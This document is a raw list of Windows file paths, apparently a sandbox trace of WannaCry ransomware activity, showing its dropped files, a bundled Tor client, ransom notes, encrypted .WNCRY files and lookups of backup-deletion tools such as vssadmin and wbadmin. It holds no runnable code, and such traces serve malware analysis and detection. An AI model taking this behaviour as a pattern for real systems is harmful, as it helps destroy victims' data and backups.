C:\Users\user\Links\desktop.ini
C:\Users\user\Saved Games\desktop.ini
C:\Windows\System32\shdocvw.dll
C:\Windows\AppPatch\sysmain.sdb
C:\Windows\System32\
C:\Windows\SysWOW64\shdocvw.dll
C:\Windows
C:\Windows\System32
C:\Windows\System32\*.*
C:\Windows\SysWOW64
C:\Windows\System32\en-US\shdocvw.dll.mui
\??\PIPE\srvsvc
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoHotkey
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Boxstarter
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerShell
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 3.8
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
C:\Users\Public\desktop.ini
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Users\user\Desktop\~SDBC6D.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini
C:\Users\Public\Desktop\~SD38ED.tmp
C:\Users\user\Desktop\
C:\Users\user\Desktop\*.*
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete
C:\Users\user\Desktop\ui\SwDRM.dll
C:\Users\user\Desktop\@WanaDecryptor@.exe.Config
C:\Users\user\Desktop\@wanadecryptor@.exe
C:\Windows\System32\imageres.dll
C:\Users\user\
C:\Users\user\AppData\Local\Temp\@wanadecryptor@.exe
C:\Windows\System32\PhotoMetadataHandler.dll
C:\Windows\System32\ieframe.dll
C:\Windows\System32\stdole2.tlb
C:\Windows\System32\shell32.dll
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe:Zone.Identifier
C:\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_clicktorun_db4f72d876da6c52.cdf-ms
C:\Windows\System32\en-US\odbcint.dll.mui
C:\Windows\WindowsShell.Manifest
C:\Windows\win.ini
C:\Windows\System32\uxtheme.dll.Config
C:\Windows\System32\uxtheme.dll
C:\Windows\Fonts\staticcache.dat
C:\Users\user\AppData\Local\Temp\*.res
C:\Users\user\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
C:\Users\user\AppData\Local\Temp\TaskData
C:\Users\user\AppData\Local\Temp\TaskData\Data
C:\Users\user\AppData\Local\Temp\TaskData\Data\
C:\Users\user\AppData\Local\Temp\TaskData\Data\Tor
C:\Users\user\AppData\Local\Temp\TaskData\Data\Tor\
C:\Users\user\AppData\Local\Temp\TaskData\Tor
C:\Users\user\AppData\Local\Temp\TaskData\Tor\
C:\Users\user\AppData\Local\Temp\TaskData\Tor\libeay32.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\libevent_core-2-0-5.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\libevent_extra-2-0-5.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\ssleay32.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\tor.exe
C:\Users\user\AppData\Local\Temp\TaskData\Tor\zlib1.dll
C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
C:\Windows\Temp
\??\PIPE\wkssvc
C:\Users\user\AppData\Roaming\tor\torrc-defaults
C:\Users\user\AppData\Roaming\tor\torrc
C:\Users\user\AppData\Roaming\tor
C:\Users\user\AppData\Roaming\tor\lock
C:\Users\user\AppData\Roaming\tor\state
C:\Users\user\AppData\Roaming\tor\state.tmp
C:\Users\user\AppData\Roaming\tor\router-stability
C:\Users\user\AppData\Roaming\tor\geoip
C:\Users\user\AppData\Roaming\tor\geoip6
C:\Users\user\AppData\Roaming\tor\unparseable-descs
C:\Users\user\AppData\Roaming\tor\key-pinning-entries
C:\Users\user\AppData\Roaming\tor\cached-certs
C:\Users\user\AppData\Roaming\tor\cached-consensus
C:\Users\user\AppData\Roaming\tor\unverified-consensus
C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus
C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus
C:\Users\user\AppData\Roaming\tor\cached-microdescs
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
C:\Users\user\AppData\Roaming\tor\cached-microdescs.new
C:\Users\user\AppData\Roaming\tor\cached-descriptors
C:\Users\user\AppData\Roaming\tor\cached-descriptors.new
C:\Users\user\AppData\Roaming\tor\cached-extrainfo
C:\Users\user\AppData\Roaming\tor\cached-extrainfo.new
C:\Users\user\AppData\Local\Temp\msg\m_English.wnry
C:\Users\user\AppData\Local\Temp\reg.*
C:\Users\user\AppData\Local\Temp\reg
C:\Python38\Scripts\reg.*
C:\Python38\Scripts\reg
C:\Python38\reg.*
C:\Python38\reg
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\reg.*
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\reg
C:\ProgramData\Boxstarter\reg.*
C:\ProgramData\Boxstarter\reg
C:\Windows\System32\reg.*
C:\Windows\System32\reg.COM
C:\Windows\System32\reg.exe
C:\Users\user\AppData\Local\Temp\vssadmin.*
C:\Users\user\AppData\Local\Temp\vssadmin
C:\Python38\Scripts\vssadmin.*
C:\Python38\Scripts\vssadmin
C:\Python38\vssadmin.*
C:\Python38\vssadmin
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vssadmin.*
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vssadmin
C:\ProgramData\Boxstarter\vssadmin.*
C:\ProgramData\Boxstarter\vssadmin
C:\Windows\System32\vssadmin.*
C:\Windows\System32\vssadmin.COM
C:\Windows\System32\vssadmin.exe
C:\Users\user\AppData\Local\Temp\wmic.*
C:\Users\user\AppData\Local\Temp\wmic
C:\Python38\Scripts\wmic.*
C:\Python38\Scripts\wmic
C:\Python38\wmic.*
C:\Python38\wmic
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\wmic.*
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\wmic
C:\ProgramData\Boxstarter\wmic.*
C:\ProgramData\Boxstarter\wmic
C:\Windows\System32\wmic.*
C:\Windows\System32\wmic
C:\Windows\wmic.*
C:\Windows\wmic
C:\Windows\System32\wbem\wmic.*
C:\Windows\System32\wbem\WMIC.COM
C:\Windows\System32\wbem\WMIC.exe
C:\Users\user\AppData\Local\Temp\bcdedit.*
C:\Users\user\AppData\Local\Temp\bcdedit
C:\Python38\Scripts\bcdedit.*
C:\Python38\Scripts\bcdedit
C:\Python38\bcdedit.*
C:\Python38\bcdedit
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\bcdedit.*
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\bcdedit
C:\ProgramData\Boxstarter\bcdedit.*
C:\ProgramData\Boxstarter\bcdedit
C:\Windows\System32\bcdedit.*
C:\Windows\System32\bcdedit
C:\Windows\bcdedit.*
C:\Windows\bcdedit
C:\Windows\System32\wbem\bcdedit.*
C:\Windows\System32\wbem\bcdedit
C:\Windows\System32\WindowsPowerShell\v1.0\bcdedit.*
C:\Windows\System32\WindowsPowerShell\v1.0\bcdedit
C:\ProgramData\chocolatey\bin\bcdedit.*
C:\ProgramData\chocolatey\bin\bcdedit
C:\Program Files\dotnet\bcdedit.*
C:\Program Files\dotnet\bcdedit
C:\Program Files (x86)\dotnet\bcdedit.*
C:\Program Files (x86)\dotnet\bcdedit
C:\Program Files\OpenJDK\jdk-19.0.1\bin\bcdedit.*
C:\Program Files\OpenJDK\jdk-19.0.1\bin\bcdedit
C:\Program Files\PowerShell\7-preview\preview\bcdedit.*
C:\Program Files\PowerShell\7-preview\preview\bcdedit
C:\Users\user\AppData\Local\Temp\wbadmin.*
C:\Users\user\AppData\Local\Temp\wbadmin
C:\Python38\Scripts\wbadmin.*
C:\Python38\Scripts\wbadmin
C:\Python38\wbadmin.*
C:\Python38\wbadmin
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\wbadmin.*
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\wbadmin
C:\ProgramData\Boxstarter\wbadmin.*
C:\ProgramData\Boxstarter\wbadmin
C:\Windows\System32\wbadmin.*
C:\Windows\System32\wbadmin
C:\Windows\wbadmin.*
C:\Windows\wbadmin
C:\Windows\System32\wbem\wbadmin.*
C:\Windows\System32\wbem\wbadmin
C:\Windows\System32\WindowsPowerShell\v1.0\wbadmin.*
C:\Windows\System32\WindowsPowerShell\v1.0\wbadmin
C:\ProgramData\chocolatey\bin\wbadmin.*
C:\ProgramData\chocolatey\bin\wbadmin
C:\Program Files\dotnet\wbadmin.*
C:\Program Files\dotnet\wbadmin
C:\Program Files (x86)\dotnet\wbadmin.*
C:\Program Files (x86)\dotnet\wbadmin
C:\Program Files\OpenJDK\jdk-19.0.1\bin\wbadmin.*
C:\Program Files\OpenJDK\jdk-19.0.1\bin\wbadmin
C:\Program Files\PowerShell\7-preview\preview\wbadmin.*
C:\Program Files\PowerShell\7-preview\preview\wbadmin
\??\PIPE\samr
C:
C:\Windows\System32\wbem\XSL-Mappings.xml
C:\Windows\System32\wbem\en-US\wmiutils.dll.mui
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Windows\System32\netmsg.dll
C:\Windows\System32\en-US\netmsg.dll.mui
C:\Windows\System32\en\netmsg.dll.mui
C:\Windows\sysnative\en\netmsg.dll.mui
C:\Program Files
C:\Program Files\Common Files
C:\Program Files\Common Files\Microsoft Shared
C:\Program Files\Common Files\Microsoft Shared\ClickToRun
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20251208-1350.log
C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe.3.Manifest
C:\Users\user\AppData\Local\Temp\TaskData\*
C:\Users\user\AppData\Local\Temp\TaskData\Tor\*
C:\Users\user\AppData\Local\Temp\TaskData\Data\*
C:\Users\user\AppData\Local\Temp\TaskData\Data\Tor\*
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
C:\Users\user\AppData\Local\Temp\WPF\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\WPDNSE\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\TaskData\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\msg\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\Low\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\hsperfdata_user\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\Deployment\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\cab\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\acrord32_sbx\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\TaskData\Tor\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\TaskData\Data\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\Deployment\MK9E76ER.PET\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\TaskData\Data\Tor\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\USERDUM-8A61A1P*.log
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\SearchEmbdIndex\USERDUM-8A61A1P*.log
\??\Nsi
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\
C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\user\AppData\Local\Temp\u.wnry
C:\Users\user\AppData\Local\Temp\@Please_Read_Me@.txt
C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
C:\Users\user\AppData\Local\Temp\b.wnry
C:\Users\user\AppData\Local\Temp\TaskData\Tor\tor.exe
C:\Users\user\AppData\Local\Temp\b.wnry
C:\Users\user\AppData\Local\Temp\c.wnry
C:\Users\user\AppData\Local\Temp\msg\m_bulgarian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_chinese (simplified).wnry
C:\Users\user\AppData\Local\Temp\msg\m_chinese (traditional).wnry
C:\Users\user\AppData\Local\Temp\msg\m_croatian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_czech.wnry
C:\Users\user\AppData\Local\Temp\msg\m_danish.wnry
C:\Users\user\AppData\Local\Temp\msg\m_dutch.wnry
C:\Users\user\AppData\Local\Temp\msg\m_english.wnry
C:\Users\user\AppData\Local\Temp\msg\m_filipino.wnry
C:\Users\user\AppData\Local\Temp\msg\m_finnish.wnry
C:\Users\user\AppData\Local\Temp\msg\m_french.wnry
C:\Users\user\AppData\Local\Temp\msg\m_german.wnry
C:\Users\user\AppData\Local\Temp\msg\m_greek.wnry
C:\Users\user\AppData\Local\Temp\msg\m_indonesian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_italian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_japanese.wnry
C:\Users\user\AppData\Local\Temp\msg\m_korean.wnry
C:\Users\user\AppData\Local\Temp\msg\m_latvian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_norwegian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_polish.wnry
C:\Users\user\AppData\Local\Temp\msg\m_portuguese.wnry
C:\Users\user\AppData\Local\Temp\msg\m_romanian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_russian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_slovak.wnry
C:\Users\user\AppData\Local\Temp\msg\m_spanish.wnry
C:\Users\user\AppData\Local\Temp\msg\m_swedish.wnry
C:\Users\user\AppData\Local\Temp\msg\m_turkish.wnry
C:\Users\user\AppData\Local\Temp\msg\m_vietnamese.wnry
C:\Users\user\AppData\Local\Temp\r.wnry
C:\Users\user\AppData\Local\Temp\s.wnry
C:\Users\user\AppData\Local\Temp\t.wnry
C:\Users\user\AppData\Local\Temp\taskdl.exe
C:\Users\user\AppData\Local\Temp\taskse.exe
C:\Users\user\AppData\Local\Temp\u.wnry
C:\Users\user\AppData\Local\Temp\00000000.pky
C:\Users\user\AppData\Local\Temp\00000000.eky
C:\Users\user\AppData\Local\Temp\00000000.res
C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
C:\Users\user\AppData\Local\Temp\275781765172918.bat
C:\Users\user\AppData\Local\Temp\@Please_Read_Me@.txt
C:\Users\user\Desktop\~SD7362.tmp
C:\Users\user\Documents\~SD73C1.tmp
C:\Users\user\Documents\WindowsPowerShell\~SD73E1.tmp
C:\Users\Default\Desktop\~SD73F2.tmp
C:\Users\Default User\Desktop\~SD7412.tmp
C:\Users\Public\Desktop\~SD7432.tmp
C:\Users\Default\Documents\~SD7443.tmp
C:\Users\Default User\Documents\~SD7454.tmp
C:\Users\Public\Documents\~SD7464.tmp
C:\~SD7475.tmp
C:\@Please_Read_Me@.txt
C:\@WanaDecryptor@.exe
C:\$Recycle.Bin\~SD7486.tmp
C:\$Recycle.Bin\S-1-5-21-1249488040-416823385-3057894055-500\~SD74A6.tmp
C:\$Recycle.Bin\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD74B6.tmp
C:\$Recycle.Bin\S-1-5-21-3047202784-114954003-3208681637-500\~SD74D7.tmp
C:\ba69bdf0a250e352360c33\~SD74E7.tmp
C:\ba69bdf0a250e352360c33\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1025\~SD7508.tmp
C:\ba69bdf0a250e352360c33\1025\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1025\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1025\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1025\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1028\~SD7566.tmp
C:\ba69bdf0a250e352360c33\1028\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1028\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1028\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1028\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1029\~SD7596.tmp
C:\ba69bdf0a250e352360c33\1029\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1029\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1029\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1029\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1030\~SD75B6.tmp
C:\ba69bdf0a250e352360c33\1030\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1030\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1030\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1030\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1031\~SD75E6.tmp
C:\ba69bdf0a250e352360c33\1031\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1031\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1031\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1031\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1032\~SD7616.tmp
C:\ba69bdf0a250e352360c33\1032\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1032\eula.rtf.WNCRY
C:\Users\user\AppData\Local\Temp\f.wnry
C:\ba69bdf0a250e352360c33\1032\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1032\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1033\~SD7627.tmp
C:\ba69bdf0a250e352360c33\1033\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1033\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1033\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1033\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1035\~SD7637.tmp
C:\ba69bdf0a250e352360c33\1035\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1035\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1035\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1035\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1036\~SD7638.tmp
C:\ba69bdf0a250e352360c33\1036\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1036\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1036\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1036\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1037\~SD7649.tmp
C:\ba69bdf0a250e352360c33\1037\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1037\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1037\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1037\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1038\~SD765A.tmp
C:\ba69bdf0a250e352360c33\1038\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1038\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1038\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1038\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1040\~SD767A.tmp
C:\ba69bdf0a250e352360c33\1040\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1040\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1040\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1040\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1041\~SD767B.tmp
C:\ba69bdf0a250e352360c33\1041\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1041\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1041\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1041\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1042\~SD767C.tmp
C:\ba69bdf0a250e352360c33\1042\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1042\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1042\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1042\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1043\~SD768D.tmp
C:\ba69bdf0a250e352360c33\1043\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1043\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1043\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1043\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1044\~SD768E.tmp
C:\ba69bdf0a250e352360c33\1044\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1044\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1044\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1044\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1045\~SD769E.tmp
C:\ba69bdf0a250e352360c33\1045\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1045\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1045\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1045\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1046\~SD76BE.tmp
C:\ba69bdf0a250e352360c33\1046\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1046\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1046\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1046\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1049\~SD76CF.tmp
C:\ba69bdf0a250e352360c33\1049\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1049\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1049\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1049\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1053\~SD76E0.tmp
C:\ba69bdf0a250e352360c33\1053\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1053\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1053\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1053\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1055\~SD771F.tmp
C:\ba69bdf0a250e352360c33\1055\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1055\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1055\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1055\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\2052\~SD776E.tmp
C:\ba69bdf0a250e352360c33\2052\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\2052\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\2052\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\2052\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\2070\~SD77DD.tmp
C:\ba69bdf0a250e352360c33\2070\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\2070\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\2070\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\2070\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\3082\~SD781C.tmp
C:\ba69bdf0a250e352360c33\3082\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\3082\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\3082\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\3082\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\Graphics\~SD783C.tmp
C:\ba69bdf0a250e352360c33\NetFx45\~SD783D.tmp
C:\ba69bdf0a250e352360c33\NetFx451\~SD783E.tmp
C:\ba69bdf0a250e352360c33\NetFx452\~SD784F.tmp
C:\ba69bdf0a250e352360c33\NetFx46\~SD7850.tmp
C:\ba69bdf0a250e352360c33\NetFx461\~SD7851.tmp
C:\ba69bdf0a250e352360c33\NetFx462\~SD7862.tmp
C:\ba69bdf0a250e352360c33\NetFx47\~SD7863.tmp
C:\ba69bdf0a250e352360c33\NetFx471\~SD7864.tmp
C:\ba69bdf0a250e352360c33\NetFx472\~SD7865.tmp
C:\Boot\~SD7866.tmp
C:\Boot\cs-CZ\~SD7867.tmp
C:\Boot\da-DK\~SD7868.tmp
C:\Boot\de-DE\~SD7869.tmp
C:\Boot\el-GR\~SD786A.tmp
C:\Boot\en-US\~SD787A.tmp
C:\Boot\es-ES\~SD787B.tmp
C:\Boot\fi-FI\~SD787C.tmp
C:\Boot\Fonts\~SD787D.tmp
C:\Boot\fr-FR\~SD787E.tmp
C:\Boot\hu-HU\~SD787F.tmp
C:\Boot\it-IT\~SD7880.tmp
C:\Boot\ja-JP\~SD7881.tmp
C:\Boot\ko-KR\~SD7882.tmp
C:\Boot\nb-NO\~SD7893.tmp
C:\Boot\nl-NL\~SD7894.tmp
C:\Boot\pl-PL\~SD7895.tmp
C:\Boot\pt-BR\~SD7896.tmp
